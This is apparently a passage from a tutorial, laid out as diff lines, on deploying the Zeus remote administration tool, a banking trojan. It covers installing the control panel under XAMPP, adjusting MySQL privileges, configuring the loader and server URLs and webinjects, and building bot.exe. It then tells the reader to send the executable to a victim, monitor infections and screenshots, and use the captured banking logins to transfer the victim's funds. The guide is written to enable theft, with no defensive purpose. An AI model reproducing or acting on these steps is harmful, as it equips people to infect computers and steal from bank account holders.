+Create a new folder inside C:\xampp\htdocs. We named the folder “bot” then
+copied the server[php] contents into C:\xampp\htdocs\bot.
+Now back again into your web browser and type
+“http://localhost/bot/install” into the address bar.
+Input all required fields with the correct information.
+
+INFORMATION:
+The host address for MySQL filled with your database server IP address. If you
+run XAMPP it should be your IP address.
+The database is filled with information about our database name that already
+created in the step.
+Fill in the encryption key with any character’s length ranging from 1 – 255 then
+simply hit the “Install” button to start installing.
+SIDE NOTE: In case if you get this error below:
+ERROR: Failed to connect to MySQL server: Host “myusername” is not allowed
+to connect to this MySQL server.
+You need to take the following steps to mitigate the error:
+• Open your “PHPMyAdmin” by typing
+“http://localhost/phpmyadmin” in your browser then click the
+“Privileges” tab.
+
+• Click the “edit” button to edit the root user privileges.
+• In the edit user page, scroll down and find the “login information”
+section.
+• Change the Host from “localhost” to “any other name” and press the
+“Go” button.
+This is the information preview if Zeus remote administration tool webserver
+was successfully installed.
+Now you will start configuring to create the Zeus bot client.
+Open the builder folder and open the config.txt configuration file.
+Change the url_config, url_loader, and url_server configuration according to
+your setting, you can see my setting in the picture below.
+IMPORTANT: Don’t forget to edit the path of webinjects.txt.
+
+Now for the next step, open the zsb.exe file, in the picture below we have
+already created the step-by-step to build the bot executable.
+Just keep following the steps below.
+After all the build bot config and bot executable on step 7, now we have the
+new file config.bin and bot.exe copy these two files into the htdocs folder, ours
+was inside the “C:\xampp\htdocs\bot”.
+
+Now let’s says you will send the generated bot.exe to your victim.
+After your victim executes your file by opening it you can check your attacking
+server by opening your browser and typing “http://localhost/bot/cp.php”
+(you will require to insert your username and password).
+You will be able to see your new infected victim in the web interface and even
+view the desktop screenshot of your victim.
+
+Are you excited? We bet you are!
+Once your victim is successfully infected, you can gather a treasure trove of
+information from your victim in that treasure trove you will gather the
+username and password of their banking accounts since this tool can act as a
+keylogger by capturing all of their log in information which you can use later to
+log into their bank account to move their funds into your bank account.
+Good Luck, get your success you deserve it, we will see you on the
+other side!